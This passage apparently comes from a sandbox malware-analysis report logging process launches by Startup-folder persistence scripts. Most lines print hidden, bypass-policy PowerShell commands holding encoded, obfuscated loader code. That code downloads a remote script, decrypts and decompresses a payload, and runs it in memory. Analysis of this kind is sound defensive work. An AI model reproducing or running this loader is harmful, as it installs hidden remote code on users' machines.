FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06